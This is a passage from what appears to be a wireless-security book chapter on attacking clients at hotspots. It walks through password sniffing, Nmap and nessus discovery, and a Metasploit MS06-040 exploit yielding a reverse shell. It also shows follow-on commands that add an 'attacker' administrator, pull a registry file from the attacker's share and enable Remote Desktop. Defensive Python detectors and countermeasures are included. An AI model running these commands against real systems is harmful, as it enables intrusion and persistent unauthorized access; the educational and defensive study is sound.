CLIENT ATTACKS

There are many attacks that can be performed against the client. In some cases, the attacker may want to root the client boxes; in other cases, the attacker may want to compromise private information such as account numbers. This section discusses many attacks that can be used for both purposes.

Sniffing

Popularity: 8
Simplicity: 9
Impact: 9
Risk Rating: 9

Sniffing attacks have already been covered in detail in Chapter 5. In order to make this chapter complete, however, I'll briefly cover a couple of tools that can be used to sniff a hotspot. Two simple open-source tools are Wireshark (formerly Ethereal) and Dug Song's suite of network attack tools, dsniff. Wireshark is a robust network sniffer and a powerful tool for decoding complex TCP streams on a busy network. My favorite feature is Decode TCP Stream (see Figure 9-7), which is available by right-clicking a packet in most versions.

The other sniffer that is specifically designed for password sniffing is dsniff. It cuts out all the superfluous noise in a raw packet capture and focuses only on the actual cleartext usernames and passwords that the attacker needs. This is an old tool, but many cleartext protocols are still used extensively today.

dep0ts-attack-Computer:~ dep0t$ sudo dsniff -ni en0
dsniff: listening on en0
-----------------
11/26/06 17:56:30 udp 192.168.1.105.1056 -> 192.168.1.20.161 (snmp)
[version 1]
public

Figure 9-7: Decoding the TCP stream in Wireshark

Exploiting Client Vulnerabilities

Popularity: 8
Simplicity: 6
Impact: 9
Risk Rating: 8

Another way to have fun on a hotspot is by attacking locally connected clients. Some hotspots limit connectivity between clients, but most do not. These attacks work on wireless and wired hotspots. In many cases, you do not even need to pay for the Internet connectivity to take advantage of the network to attack other clients. This section will discuss some of the high-level techniques involved in discovering and exploiting clients. There are many different methods you can use, but this section will serve as a general overview to get you started.

My attack platform of choice is OS X. This section focuses on tools that are not specific to OS X, but are available on many platforms. The options may differ slightly between versions and platforms. In order to install the needed tools on OS X, you will need to install the developer tools from the original OS X CD along with the X environment and get the Darwin Ports from http://www.darwinports.opendarwin.org.

First, make sure your ports are up-to-date:

Last login: Sat Nov 25 08:42:22 on console
Welcome to Darwin!
dep0ts-attack-Computer:~ dep0t$ sudo port sync
Password:
dep0ts-attack-Computer:~ dep0t$

The primary tool that you need is a port scanner. There are many different scanners available, but I have been using Nmap for years. It is generally available for all platforms, open source and free. Here is how I install Nmap on my OS X attack box:

dep0ts-attack-Computer:~ dep0t$ sudo port install nmap
--->  Fetching nmap
--->  Attempting to fetch nmap-4.11.tar.bz2 from http://download.insecure.org/nmap/dist/
--->  Verifying checksum(s) for nmap
--->  Extracting nmap
--->  Configuring nmap
--->  Building nmap with target all
--->  Staging nmap into destroot
--->  Installing nmap 4.11_0
--->  Activating nmap 4.11_0
--->  Cleaning nmap
dep0ts-attack-Computer:~ dep0t$

For the rest of the section, I will briefly comment on how to install tools, but not include all the details. Now that Nmap is installed, let's see who else is on the network. In order to discover who is on your network, you need to be able to find your IP address. On Windows, open a command prompt (click Start, choose Run, and type cmd.exe). When the command window opens, type ipconfig /all. Figure 9-8 shows the results.

On OS X, you can access your IP address by using the terminal window and the ifconfig command. The following is the text from the command:

dep0ts-attack-Computer:~ dep0t$ ifconfig en0
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        inet6 fe80::217:f2ff:fe00:439a%en0 prefixlen 64 scopeid 0x4
        inet 192.168.1.10 netmask 0xffffff00 broadcast 192.168.1.255
        ether 00:17:f2:00:43:9a
        media: autoselect
dep0ts-attack-Computer:~ dep0t$

Figure 9-8: ipconfig results

The network IP is 192.168.1.10 with a netmask of 0xffffff00 or 255.255.255.0. You will now scan the local subnet using Nmap. You do not need to perform a complete scan, but a simple ping sweep to tell you if there are any other hosts on the network:

dep0ts-attack-Computer:~ dep0t$ nmap -sP 192.168.1.0/24
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2006-11-25 10:14 PST
Host 192.168.1.1 appears to be up.
Host 192.168.1.10 appears to be up.
Host 192.168.1.20 appears to be up.
Host 192.168.1.21 appears to be up.
Host 192.168.1.100 appears to be up.
Host 192.168.1.106 appears to be up.
Host 192.168.1.110 appears to be up.
Host 192.168.1.114 appears to be up.
Host 192.168.1.240 appears to be up.
Nmap finished: 256 IP addresses (9 hosts up) scanned in 1.956 seconds
dep0ts-attack-Computer:~ dep0t$

I chose to use the ping scan using the -sP parameter. This is a fast way to scan a network looking for hosts that are alive. Now you will scan a couple of the hosts to see if there are any interesting services:

dep0ts-attack-Computer:~ dep0t$ nmap 192.168.1.20
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2006-11-25 10:17 PST
Interesting ports on 192.168.1.20:
Not shown: 1678 closed ports
PORT     STATE SERVICE
80/tcp   open  http
9100/tcp open  jetdirect
Nmap finished: 1 IP address (1 host up) scanned in 0.383 seconds
dep0ts-attack-Computer:~ dep0t$ nmap 192.168.1.240
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2006-11-25 10:18 PST
Interesting ports on 192.168.1.240:
Not shown: 1275 closed ports, 403 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
1900/tcp open  UPnP
Nmap finished: 1 IP address (1 host up) scanned in 13.030 seconds
dep0ts-attack-Computer:~ dep0t$

There is an HP network printer at 192.168.1.20. If the administrator did not add a password, you could log in and change the configuration, making an annoying banner page, or maybe print the dictionary, but let's move on to the other host. There's a web server on 192.168.1.240. Fire up your browser and take a look (see Figure 9-9).
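The discovery steps above (a ping sweep of the /24 followed by a port scan of one host) leave a distinctive trace in any gateway or host firewall log that records new flows. As an added example that is not from the book, here is a small Python detector run over a constructed connection log; the log format, the five-second window and the two thresholds are assumptions, so adjust them to whatever device actually produces your logs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed log format (an assumption): "<ISO time> <proto> <src> -> <dst>:<port>"
LINE_RE = re.compile(r"^(\S+) (\w+) (\S+) -> (\S+):(\d+)$")

def parse_line(line):
    # One log line -> (timestamp, proto, src, dst, port); rejects anything off-format
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ts, proto, src, dst, port = m.groups()
    return datetime.fromisoformat(ts), proto, src, dst, int(port)

def detect_scans(lines, window=timedelta(seconds=5), host_threshold=16, port_threshold=8):
    """Return sorted (src, kind, count) alerts; kind is 'sweep' or 'portscan'."""
    per_src = defaultdict(list)
    for rec in map(parse_line, lines):
        per_src[rec[2]].append(rec)
    alerts = {}
    for src, recs in per_src.items():
        recs.sort()
        for i, (ts, _, _, _, _) in enumerate(recs):
            # every event from this source inside the window ending at recs[i]
            recent = [r for r in recs[: i + 1] if ts - r[0] <= window]
            hosts = {r[3] for r in recent}
            ports = defaultdict(set)  # distinct TCP/UDP ports probed per target host
            for r in recent:
                if r[1] != "icmp":
                    ports[r[3]].add(r[4])
            busiest = max((len(p) for p in ports.values()), default=0)
            if len(hosts) >= host_threshold:
                alerts[(src, "sweep")] = max(alerts.get((src, "sweep"), 0), len(hosts))
            if busiest >= port_threshold:
                alerts[(src, "portscan")] = max(alerts.get((src, "portscan"), 0), busiest)
    return sorted((s, k, n) for (s, k), n in alerts.items())

def constructed_log():
    """Constructed sample: a sweep and a port scan from .10, benign browsing from .106."""
    base = datetime(2006, 11, 25, 10, 14, 0)
    lines = []
    for i in range(1, 21):  # ping sweep: 20 hosts probed within one second
        t = base + timedelta(milliseconds=50 * i)
        lines.append(f"{t.isoformat()} icmp 192.168.1.10 -> 192.168.1.{i}:0")
    for j, port in enumerate([21, 22, 23, 25, 80, 110, 139, 443, 445, 9100]):
        t = base + timedelta(seconds=3, milliseconds=10 * j)  # then 10 ports on one host
        lines.append(f"{t.isoformat()} tcp 192.168.1.10 -> 192.168.1.20:{port}")
    for k in range(3):  # benign client: three connections to a single web server
        lines.append(f"{(base + timedelta(seconds=k)).isoformat()} tcp 192.168.1.106 -> 192.168.1.240:80")
    return lines
```

Running detect_scans(constructed_log()) flags 192.168.1.10 twice (a sweep of 20 hosts and a 10-port scan of 192.168.1.20) and stays silent about the browsing client.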

There are many types of devices commonly found on hotspot networks: webcams, printers, cash registers, and media servers to name a few. I have even come across OS X users sharing their music and photos.

Caution 

Home users beware! If you have a home network with an access point, you need to lock down anything that you do not want to share with the neighborhood. Remember, personal video recorders, cameras, phones, printers, and video game consoles all have network connections. Using a technique described in the previous section on sniffing, an eavesdropper could even see the websites you are visiting.

Now that you have used some tools to discover the hotspot network, the next step is to find out if the discovered hosts have any exploitable vulnerabilities. One of the best available vulnerability scanners, nessus, is open source and runs on many platforms. It is a generic vulnerability scanner and can be used to discover many common vulnerabilities on a variety of platforms. The nessus report needs to be validated, however: most nessus reports contain false positives and vulnerabilities that may not be exploitable.

Figure 9-9: The web server we found

You might find that a more specific scanner better suits your needs. Here are the steps to install and use nessus on my attack MacBook:

sudo port install gtk2
sudo port install nessus-core
sudo port install nessus-plugins
sudo nessus-mkcert
sudo nessus-fetch --register <your activation code available at nessus.org>
sudo nessus-update-plugins -v <if you activated>
sudo nessusd -D (the daemon must run as root)
sudo nessus-adduser
nessus (in a X11 terminal)

You could use nessus to scan all the hosts on the hotspot, but using Nmap you can narrow down your targets to a single IP address. Now fire up the nessus client and target your host. In this example, we've moved to another hotspot and have chosen 10.37.129.4. The scan took only about two minutes, and Figure 9-10 shows the summary report (saved in HTML format and pulled up in my browser).

Figure 9-10: The Nessus Scan Report

nessus found multiple security holes on the host. If you drill down into the report details, you will see that it identified one vulnerability and specifically identified it as being from Microsoft security bulletin MS06-040 (see Figure 9-11). Now it is time to exploit the vulnerability.

Tip 

Some corporate guest networks are also used as part of a Network Access Control (NAC) infrastructure for remediation of hosts that are identified as not meeting the entry requirements for the corporate network. For example, all Windows XP devices may be required to have Service Pack 2 installed. Computers attempting to connect without Service Pack 2 may be diverted to the guest network, so the service pack can be installed before accessing the corporate network. Therefore, guest networks are full of vulnerable hosts. Many of these hosts have the firewall disabled so tools can be used to install software. This is an attacker's dream and an administrator's nightmare.

The best open-source exploit platform is Metasploit. Metasploit not only has a good inventory of exploits, but also many payloads that can be used to take advantage of the vulnerabilities for many different purposes. Here is how to install Metasploit to exploit the vulnerabilities found with nessus on the locally connected clients:

sudo port install ruby

Figure 9-11: nessus scan details

Metasploit needs ruby to function properly.

Next, you download the Metasploit framework from the project site, expand it into your folder, and run the framework from a terminal window. If you are using Windows, there is a cygwin package that includes everything you need. I prefer to use the console. You can review the documentation to find out how to choose an exploit and payload, but here are the commands to create a reverse shell from the vulnerability identified by nessus:

dep0ts-attack-Computer:/opt/local/share/metasploit/framework-2.7 dep0t$ ./msfconsole
Using Term::ReadLine::Stub, I suggest installing something better
(ie Term::ReadLine::Gnu)
                                  _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | |  __  _| |_
|    \ / _  )  _)/ _  |/___ ) _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | |_| | | |_| | | |__
|_|_|_|\____)\___)_||_(___/|  __/|_|\___/|_|\___)
                           |_|

+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads]
msf > use netapi_ms06_040
msf netapi_ms06_040 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf netapi_ms06_040(win32_reverse) > set RHOST 10.37.129.4
RHOST -> 10.37.129.4
msf netapi_ms06_040(win32_reverse) > set LHOST 10.37.129.2
LHOST -> 10.37.129.2
msf netapi_ms06_040(win32_reverse) > set LPORT 5150
LPORT -> 5150
msf netapi_ms06_040(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Detected a Windows XP target
[*] This will not work on Service Pack 2!
[*] Sending request...
[*] The server rejected it, trying again...
[*] Got connection from 10.37.129.2:5150 <-> 10.37.129.4:1031
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Now you have a reverse shell from the victim machine. Just to verify, check the IP of this Windows box:

C:\WINDOWS\system32>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.37.129.4
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 10.37.129.1

C:\WINDOWS\system32>

You now have system access to the victim machine and can perform anything that you want on the machine. As a proof of concept, what about adding a local administrator user and enabling remote desktop on the victim machine?

net user attacker foobar /add
net localgroup administrators attacker /add
net use r: \\10.37.129.2\dump foobar /user:attacker
copy r:\remote_desktop_enable.reg %temp%
regedit /s %temp%\remote_desktop_enable.reg

The file used to modify the victim registry is shown here:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
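As a defender's counterpart to the registry change above, here is an added example (not code from the book) in Python that parses a regedit 5.00 export, such as the file regedit /e writes, and reports whether Remote Desktop has been switched on. The sample export is constructed, the text is assumed to be already decoded from the UTF-16 regedit writes, and the RDP-Tcp PortNumber check is an assumption beyond what the page shows.

```python
import re
# Constructed regedit 5.00 export (sample data, not a real host); the first key is the one
# the attacker's remote_desktop_enable.reg file modifies
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
"""
TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.+)$')  # "name"=value or @=value

def decode_value(raw):
    """Decode dword: and quoted-string values; other types stay as raw text."""
    if raw.startswith("dword:"):
        return int(raw[6:], 16)  # a dword is written as eight hex digits
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return re.sub(r"\\(.)", r"\1", raw[1:-1])  # undo the \" and \\ escapes
    return raw  # hex:, hex(2): and the "-" delete marker are left undecoded here

def parse_reg(text):
    """Parse an already-decoded .reg export into {key: {value_name: value}}."""
    if not text.lstrip().startswith("Windows Registry Editor Version 5.00"):
        raise ValueError("not a regedit 5.00 export")
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        km = KEY_RE.match(line)
        if km:
            current = keys.setdefault(km.group(1), {})
            continue
        vm = VALUE_RE.match(line)
        if vm is None or current is None:
            raise ValueError(f"unexpected line: {line!r}")
        current["@" if vm.group(2) else vm.group(1)] = decode_value(vm.group(3))
    return keys

def rdp_findings(keys):
    """List the Remote Desktop settings an auditor would flag in the export."""
    findings = []
    if keys.get(TS_KEY, {}).get("fDenyTSConnections") == 0:
        findings.append("Remote Desktop is enabled (fDenyTSConnections=0)")
    port = keys.get(TS_KEY + r"\WinStations\RDP-Tcp", {}).get("PortNumber")
    if port is not None and port != 3389:
        findings.append(f"RDP listens on non-default port {port}")
    return findings
```

On the constructed export rdp_findings reports the enabled Remote Desktop; once fDenyTSConnections is back to 1 the list is empty, so the same function doubles as a quick check after cleanup.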

This chapter was completed using Metasploit 2.7. One of the new 3.0 features, in beta during the writing of this chapter, is the inclusion of Wi-Fi attacks. The 3.0 version includes exploits for a widely used Broadcom driver and also a USB D-Link device. It also includes various DoS attacks and tools. In order to perform these attacks, you need a Linux box that supports packet injection. For more information on how to set these up, refer to the section in Chapter 4 on installing madwifi-old drivers for injection support with LORCON. A detailed walkthrough on how to set up Metasploit 3 and run one of these exploits is provided in Chapter 11 on advanced attacks.

Note 

Another way to compromise clients is by setting up your own rogue access point. This is discussed in detail in Chapter 6, in the section "Rogue APs."

Client Attack Countermeasures

Some hotspot access points are configured to restrict access between clients. Cisco refers to this as public secure packet forwarding, and it prevents some of the client-to-client attacks on a legitimate network, as shown in Figure 9-12. Keeping up-to-date with security patches and service packs will reduce vulnerabilities that can be exploited by an attacker. All current operating systems include software firewalls that should be enabled when on hotspots. VPN clients can also add a level of security by limiting connectivity and protecting cleartext protocols. Some hotspots, such as Google's, offer a VPN client to secure access.

Many of the attacks described in this chapter only work on open cleartext networks. Implementing a simple encryption mechanism can significantly complicate or completely eliminate many of these attacks. WPA pre-shared keys can be put on corporate guest networks, in hotels, or in any location where there is an expectation of a physical presence to connect to the hotspot. Instructions on how to connect with the WPA pre-shared key can be published in the hotel room, in the office, or at the cash register of the coffee shop. Pre-shared keys will keep out the attacker who doesn't have physical access to the instructions for the network. Even some low-cost Linksys routers have support for keeping users separated on their own pseudo VLANs.

Figure 9-12: Configuring Cisco's public secure packet forwarding

Countermeasure Hack

Popularity: 3
Simplicity: 3
Impact: 4
Risk Rating: 3

Even with public secure packet forwarding, a malicious attacker can take advantage of the openness of a cleartext hotspot. As discussed earlier, a local attack can respond many milliseconds faster than a legitimate site. The tool airpwn is designed for this type of attack. It is designed to inject packets into a hotspot without being associated with the access point. This attack can also be used to attack clients if MAC access controls are being used on the network. The tool listens for a particular type of request and replaces the response with the attacker's response. The general application is to replace requested images with the attacker's image. The tool is a proof-of-concept attack tool, but could be used to exploit any type of browser vulnerability.

DoS Attacks

Popularity: 2
Simplicity: 7
Impact: 7
Risk Rating: 5

Denial of service (DoS) attacks against wireless networks in general are covered in detail in Chapter 6, but they deserve a mention in the hotspot chapter. Part of the challenge in using a malicious hotspot is getting clients to attach to your network. If you can disrupt communications on the legitimate network, then maybe your victim will attach to your malicious network. It is trivial to DoS a hotspot network. The easiest attack is to use an ARP-spoofing tool and reroute all traffic to a MAC address that will not respond. This attack was discussed earlier in the chapter in the sniffing section. If the network has been configured with public secure packet forwarding, this attack won't work. If this is the case, you could flood the default gateway with packets or use a wireless protocol-based disassociation attack. Please see Chapter 6 for additional details.
